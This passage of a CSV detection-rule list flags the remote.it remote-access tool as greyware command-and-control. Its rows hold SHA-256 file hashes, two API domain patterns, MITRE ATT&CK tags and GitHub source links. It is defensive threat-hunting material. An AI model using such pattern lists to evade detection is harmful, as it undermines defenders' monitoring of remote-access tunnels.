TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8b4025c1613827180ca686411119d98da4b7540017dfee4ec0daf6631b0394fb*",".{0,1000}8b4025c1613827180ca686411119d98da4b7540017dfee4ec0daf6631b0394fb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8bc84212c03f5e2ebce1c44cc5e1315309cc685592023892841cf0873a2b3560*",".{0,1000}8bc84212c03f5e2ebce1c44cc5e1315309cc685592023892841cf0873a2b3560.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8c55fb2a90cd6c8f90e19b1cf4413ba4fc427a67ea6cdae2369abf10d3a83e88*",".{0,1000}8c55fb2a90cd6c8f90e19b1cf4413ba4fc427a67ea6cdae2369abf10d3a83e88.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8d94ccdfe844f9763d5a09b3cdaa68b44916b16f6ebcf92481837860ad010c82*",".{0,1000}8d94ccdfe844f9763d5a09b3cdaa68b44916b16f6ebcf92481837860ad010c82.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*8dcd8560184c700cf3800cbfa76639d1e3eeda602963c40f56390626c51f9aa6*",".{0,1000}8dcd8560184c700cf3800cbfa76639d1e3eeda602963c40f56390626c51f9aa6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8e306bcd87bb1fbfe39a22da9ab02751cd9289b721da818a7b0cbc2916e98493*",".{0,1000}8e306bcd87bb1fbfe39a22da9ab02751cd9289b721da818a7b0cbc2916e98493.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8e7cd66e174744da7d7c8ec0d9caee4a0b1a57d9f51d9967ae1e8fc78f938a82*",".{0,1000}8e7cd66e174744da7d7c8ec0d9caee4a0b1a57d9f51d9967ae1e8fc78f938a82.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8ee8ca3b67ad7256a43c6a7d00cee2c22ff45929cd69d75e7212c42485f37c97*",".{0,1000}8ee8ca3b67ad7256a43c6a7d00cee2c22ff45929cd69d75e7212c42485f37c97.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8f614310b7de7c1d7e19932a82f40a91e7c328966f9b3dec08fe8266bbcfdc7d*",".{0,1000}8f614310b7de7c1d7e19932a82f40a91e7c328966f9b3dec08fe8266bbcfdc7d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*906c39d77d4fab235031fb83f0dc40657c4c25251be92de4236551c15033e997*",".{0,1000}906c39d77d4fab235031fb83f0dc40657c4c25251be92de4236551c15033e997.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*908fe7bf70340eb71df77a54c9fbcedf514573e81f6efd15a9110b4a25d9b878*",".{0,1000}908fe7bf70340eb71df77a54c9fbcedf514573e81f6efd15a9110b4a25d9b878.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*9292fadcd27e41de30c6cd2356f882a53488ff91f60999170dfd4be311af37fb*",".{0,1000}9292fadcd27e41de30c6cd2356f882a53488ff91f60999170dfd4be311af37fb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*92c129a8547733e8de54b84e7e0a233cdd1330083a07cb1309926eb8dd678db9*",".{0,1000}92c129a8547733e8de54b84e7e0a233cdd1330083a07cb1309926eb8dd678db9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*930fd8e9878e8e96b022a9ab62f3471938c8c93898914df46a02d49f246abb22*",".{0,1000}930fd8e9878e8e96b022a9ab62f3471938c8c93898914df46a02d49f246abb22.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*93502803691a7c14ccd0c0132ac8b12dafb621e7840243887150c3e68836b998*",".{0,1000}93502803691a7c14ccd0c0132ac8b12dafb621e7840243887150c3e68836b998.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*954e01f392b21020cb6cb21c13199d8768ee00e24ebf32566bfdad3a212036bd*",".{0,1000}954e01f392b21020cb6cb21c13199d8768ee00e24ebf32566bfdad3a212036bd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*983582e34fcec444e33dafa6b533ba974086c16520631cd2f07fef6f523a8efc*",".{0,1000}983582e34fcec444e33dafa6b533ba974086c16520631cd2f07fef6f523a8efc.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*987f7e9147612ea1182fe989fd19c70cead695da16ee63dd26458ebb43c7b556*",".{0,1000}987f7e9147612ea1182fe989fd19c70cead695da16ee63dd26458ebb43c7b556.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*997e2ae3d49570976fdf7c1e743d23e619f8d8f3fd6fcc689545e5c357ec95a6*",".{0,1000}997e2ae3d49570976fdf7c1e743d23e619f8d8f3fd6fcc689545e5c357ec95a6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*9b6df8785bfcc71ad646fd17f581744eff6993490e5cfc1505850117eee701ab*",".{0,1000}9b6df8785bfcc71ad646fd17f581744eff6993490e5cfc1505850117eee701ab.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*9bde1bf43cd8dc8d67f5e2b773d4315344315b4a52d2be26dd49c484678bdaaa*",".{0,1000}9bde1bf43cd8dc8d67f5e2b773d4315344315b4a52d2be26dd49c484678bdaaa.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*9c61fb474707f74a2bd8529b5ee56a26baf315458c07cc8aff66d117081f1aea*",".{0,1000}9c61fb474707f74a2bd8529b5ee56a26baf315458c07cc8aff66d117081f1aea.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*9c78d685436d461ec75c3bdfcd09503eb86ce64ac58c13da6a8c82bdc2e80703*",".{0,1000}9c78d685436d461ec75c3bdfcd09503eb86ce64ac58c13da6a8c82bdc2e80703.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*9d4c213bbc51347764c8b62223c50da024037f63150d7f57ec12e22d1eaf0dfc*",".{0,1000}9d4c213bbc51347764c8b62223c50da024037f63150d7f57ec12e22d1eaf0dfc.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*9dea73ffa9687042001217d5dd36ce8083f36849cadfd88945cd55f669e9bb70*",".{0,1000}9dea73ffa9687042001217d5dd36ce8083f36849cadfd88945cd55f669e9bb70.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*9f1af621fb39dac8f826f5c5dd50cc8ef3539be72ae9b06a5607eadc23d4dc0a*",".{0,1000}9f1af621fb39dac8f826f5c5dd50cc8ef3539be72ae9b06a5607eadc23d4dc0a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*a028984075f63af783a3a261c58350a9d153e63c277db78614fb4b3aca780631*",".{0,1000}a028984075f63af783a3a261c58350a9d153e63c277db78614fb4b3aca780631.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*a0e7d15b84357f97ac46b469e179a9932682d5763204ea90590ea71ac90aa515*",".{0,1000}a0e7d15b84357f97ac46b469e179a9932682d5763204ea90590ea71ac90aa515.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*a1cb3625445b64b0302323e1f751ae23885d31e5a260766f85f492498cc43362*",".{0,1000}a1cb3625445b64b0302323e1f751ae23885d31e5a260766f85f492498cc43362.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*a42f8bc0fa9c489ea06896d74810c9bfab10738b137bc567c3e656ec6f8f5d1d*",".{0,1000}a42f8bc0fa9c489ea06896d74810c9bfab10738b137bc567c3e656ec6f8f5d1d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*a46a1cfc06ed9eb2276a879dcc949fe0256d511cf0925ab2343b9e92542fb8f2*",".{0,1000}a46a1cfc06ed9eb2276a879dcc949fe0256d511cf0925ab2343b9e92542fb8f2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*a67a2d20c217e9923d9a614870d54152379c8d4f2232114a158d5e88f9ccd4b1*",".{0,1000}a67a2d20c217e9923d9a614870d54152379c8d4f2232114a158d5e88f9ccd4b1.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*a6c8218887fdb66cefdced3195f1424a714add1f6fe369ba7ddbfe1e7434191b*",".{0,1000}a6c8218887fdb66cefdced3195f1424a714add1f6fe369ba7ddbfe1e7434191b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*a7266ba33c7873fcacfaa675551204bbc56549ec7d859635822009e0e2bda9d3*",".{0,1000}a7266ba33c7873fcacfaa675551204bbc56549ec7d859635822009e0e2bda9d3.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*a73a39cce96e40c9e574607561cabeb8f0b46ffa5b996c1071d434e6a72e34bf*",".{0,1000}a73a39cce96e40c9e574607561cabeb8f0b46ffa5b996c1071d434e6a72e34bf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*a7dff33a69fd314049f9b1ad78340c875ba5681eb4a828d1cebc79e6f09bf35c*",".{0,1000}a7dff33a69fd314049f9b1ad78340c875ba5681eb4a828d1cebc79e6f09bf35c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*ab775568ac52bb1e4ceffa6ae38c7bc11d769a6ee52cf964d9ece909c5a397fe*",".{0,1000}ab775568ac52bb1e4ceffa6ae38c7bc11d769a6ee52cf964d9ece909c5a397fe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*ab8b178678ce6ccbfeab5183c65c4de04eb768892f5710557c297e45cd567dfe*",".{0,1000}ab8b178678ce6ccbfeab5183c65c4de04eb768892f5710557c297e45cd567dfe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*ac3d4ecb448c66634efad135d94657a27eed4f8c30aa7f32e4ecb2da621c3d47*",".{0,1000}ac3d4ecb448c66634efad135d94657a27eed4f8c30aa7f32e4ecb2da621c3d47.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*add859c23de8190eca95058cc1cca930786b1c673b8dd3e25dedd8e12396469a*",".{0,1000}add859c23de8190eca95058cc1cca930786b1c673b8dd3e25dedd8e12396469a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*ae494aa39434950473ecd7ba70bd89cb9d10cabbe7637b9775a4ba1f26dee665*",".{0,1000}ae494aa39434950473ecd7ba70bd89cb9d10cabbe7637b9775a4ba1f26dee665.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*aebfc8f6a11074dfc2e95800f32edc984abeb67eb6a07c2056acb149fbc37e66*",".{0,1000}aebfc8f6a11074dfc2e95800f32edc984abeb67eb6a07c2056acb149fbc37e66.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*afe5cdae79e5f79047b9fbca32463a6b5b82b9f0b11c9ec712eff47f526a5fec*",".{0,1000}afe5cdae79e5f79047b9fbca32463a6b5b82b9f0b11c9ec712eff47f526a5fec.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*api.remot3.it*",".{0,1000}api\.remot3\.it.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*api01.remot3.it*",".{0,1000}api01\.remot3\.it.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*B00004294C7ABEDC67BD41B0F3CB0C9730BEDA03BC3CE2709B7F838585133B2C*",".{0,1000}B00004294C7ABEDC67BD41B0F3CB0C9730BEDA03BC3CE2709B7F838585133B2C.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*b122583cf21343bfe83444d90b3223ff4abd42738e5817a1ba5095ddbc0202ed*",".{0,1000}b122583cf21343bfe83444d90b3223ff4abd42738e5817a1ba5095ddbc0202ed.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*b25e38016ee6cae1175968f4686699588b208d14f27320052e097c5a252d2d1a*",".{0,1000}b25e38016ee6cae1175968f4686699588b208d14f27320052e097c5a252d2d1a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*b38a8c339aa39c37a3680e31876bc6b4e5c9f337d4c0f409fd17b696befecf93*",".{0,1000}b38a8c339aa39c37a3680e31876bc6b4e5c9f337d4c0f409fd17b696befecf93.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*b50382b91253028e0f21ca8d585456adbdd8eb05d20efe8eb024ff2253f49a3a*",".{0,1000}b50382b91253028e0f21ca8d585456adbdd8eb05d20efe8eb024ff2253f49a3a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*b57f1898dda9bdacec25669b4a8ccdb6905b5d0b9c9d0c4c3695d8aa54181bee*",".{0,1000}b57f1898dda9bdacec25669b4a8ccdb6905b5d0b9c9d0c4c3695d8aa54181bee.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*b582450f8aea64cf41134d657ff610825080ddb317b7cbc1f1c1f1e4dd2c1978*",".{0,1000}b582450f8aea64cf41134d657ff610825080ddb317b7cbc1f1c1f1e4dd2c1978.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*b64d241702d0970bca644bf2d2f90155cf12f0265cd43377e58e5bb4f54c487f*",".{0,1000}b64d241702d0970bca644bf2d2f90155cf12f0265cd43377e58e5bb4f54c487f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*b70a71c6d30d106c21cdfcd3d7bf61f8eff05d28d22538c6ea335e9818999cb5*",".{0,1000}b70a71c6d30d106c21cdfcd3d7bf61f8eff05d28d22538c6ea335e9818999cb5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*b754705e934ef0766078f0371a1e83007dc7c85ef02ccd72da4571736df1914a*",".{0,1000}b754705e934ef0766078f0371a1e83007dc7c85ef02ccd72da4571736df1914a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*bb016f6b3e240b6447a72b15b103d32b8239969ac4493b8522b4f22b21f9440c*",".{0,1000}bb016f6b3e240b6447a72b15b103d32b8239969ac4493b8522b4f22b21f9440c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*bb136a7de55ce17c6a4fd59319a724f80e53a89d0896675cdd78f98cc7bc7858*",".{0,1000}bb136a7de55ce17c6a4fd59319a724f80e53a89d0896675cdd78f98cc7bc7858.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*bce4fa4709599a20156a3ee315899a479e28eead968db5af6199bffc7288d256*",".{0,1000}bce4fa4709599a20156a3ee315899a479e28eead968db5af6199bffc7288d256.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*bd07ae00c8a28ce61d06fb344b8d646696ac3a9eba79b0df1612736009b7c509*",".{0,1000}bd07ae00c8a28ce61d06fb344b8d646696ac3a9eba79b0df1612736009b7c509.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*bd313c0a5313c056ecaabdb990ed5077602f6e97e0c57b2e21a643b06d211eb8*",".{0,1000}bd313c0a5313c056ecaabdb990ed5077602f6e97e0c57b2e21a643b06d211eb8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*bd6f80e0290c96f73f6cb4837e0050dd4f66c71cdca9da9afde6a619b4c09f11*",".{0,1000}bd6f80e0290c96f73f6cb4837e0050dd4f66c71cdca9da9afde6a619b4c09f11.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*be4d5112b9928f8c5dbb51c2e67163fb82fed8abdda5b75ffafeff43b96fc8c0*",".{0,1000}be4d5112b9928f8c5dbb51c2e67163fb82fed8abdda5b75ffafeff43b96fc8c0.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*bf33607b1f28707326ad3cda5bdd5d729e28b7c826db8c7c2affa68adf5f50b5*",".{0,1000}bf33607b1f28707326ad3cda5bdd5d729e28b7c826db8c7c2affa68adf5f50b5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
